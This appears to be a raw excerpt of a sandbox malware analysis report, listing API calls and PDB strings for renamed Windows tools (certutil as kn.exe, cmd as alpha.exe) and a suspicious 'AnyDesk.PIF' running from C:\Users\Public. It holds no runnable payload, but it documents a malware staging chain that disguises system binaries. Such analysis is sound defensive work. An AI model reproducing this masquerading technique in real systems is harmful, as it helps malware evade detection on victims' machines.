              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,7_2_00007FF68FCCF7FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC417D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,7_2_00007FF68FC417D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,7_2_00007FF68FCB97E4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,7_2_00007FF68FC1B788
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCBB794 CryptExportPublicKeyInfoEx,SetLastError,7_2_00007FF68FCBB794
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,7_2_00007FF68FC3D790
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7577C #360,#358,CryptDecodeObject,GetLastError,#357,7_2_00007FF68FC7577C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA37A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,7_2_00007FF68FCCD750
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,7_2_00007FF68FC6F774
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA5768
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA36E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF68FC8F6D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC9688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF68FCC9688
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC576B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68FC576B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCBD6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF68FCBD6A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCF650 CryptHashCertificate2,SetLastError,7_2_00007FF68FCCF650
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF68FCA3654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FC9F644
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF68FC7366C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF68FC8B664
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF68FC2D660
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC15664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF68FC15664
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC895FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF68FC895FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2F630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF68FC2F630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC2D5C2
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC655F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF68FC655F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA3590
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD9580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF68FCD9580
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCF570 CryptHashCertificate,SetLastError,7_2_00007FF68FCCF570
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF68FC6B55C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF68FCA34F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC63504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,7_2_00007FF68FC63504
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD14F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,7_2_00007FF68FCD14F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCBB4EC CryptDecodeObjectEx,SetLastError,7_2_00007FF68FCBB4EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,7_2_00007FF68FC8F488
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA9480
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCF4A0 CryptHashPublicKeyInfo,SetLastError,7_2_00007FF68FCCF4A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC05438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF68FC05438
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCBB464 CryptEncodeObjectEx,SetLastError,7_2_00007FF68FCBB464
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA342C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF68FCD141C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC853E8 CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF68FC853E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC613F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,7_2_00007FF68FC613F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68FC8B3D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF68FCA3390
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,7_2_00007FF68FCB33B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FCD93A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,7_2_00007FF68FCD739C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC833A0 CryptVerifyCertificateSignature,CertCompareCertificateName,7_2_00007FF68FC833A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,7_2_00007FF68FC5B350
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC65338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68FC65338
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC37340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,7_2_00007FF68FC37340
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,7_2_00007FF68FC2B36C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,7_2_00007FF68FC8D30C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC3D304
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,7_2_00007FF68FC3B324
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC832D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF68FC832D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC692C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,7_2_00007FF68FC692C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FC9F2F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC792D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,7_2_00007FF68FC792D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD7290 NCryptIsKeyHandle,#359,#360,#357,#358,7_2_00007FF68FCD7290
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,7_2_00007FF68FCCD28C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,7_2_00007FF68FC6B2B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF68FCA32A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3D240 #357,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF68FC3D240
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD7214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,7_2_00007FF68FCD7214
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF9208 #357,NCryptEnumKeys,#360,#358,7_2_00007FF68FCF9208
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF68FCA11C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD71C8 BCryptDestroyKey,#360,7_2_00007FF68FCD71C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF68FCA31C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC83188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,7_2_00007FF68FC83188
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD7178 BCryptCloseAlgorithmProvider,#360,7_2_00007FF68FCD7178
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC751A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC751A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,7_2_00007FF68FC8F168
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC85164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF68FC85164
              Source: AnyDesk.PIFBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A8D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A5D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1495264734.0000000002286000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1398569202.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1403371619.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1422354773.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1415961649.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1424821170.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1423749785.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1429459275.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1425860533.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1478304743.0000000005320000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
              Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000011.00000003.1483371503.0000000005120000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.17.dr
              Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1398569202.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1403371619.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1422354773.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1415961649.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1424821170.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1423749785.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1429459275.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1425860533.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1478304743.0000000005320000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
              Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A8D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1497237334.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A5D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427109635.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1481965290.0000000021982000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1481965290.00000000219B1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1495264734.0000000002286000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ping.pdb source: esentutl.exe, 00000011.00000003.1483371503.0000000005120000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.17.dr
              Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6A0E82978
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6A0E8823C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6A0E735B8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6A0E71560
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E97B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6A0E97B4C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6A0E82978
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6A0E8823C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6A0E735B8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6A0E71560
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E97B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6A0E97B4C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68FCE3100
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68FCE10C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF68FCE6F80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68FC7C6F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF68FCE234C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC85E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF68FC85E58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68FC8DBC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF68FCE1B04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF68FCE19F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF68FCC3674
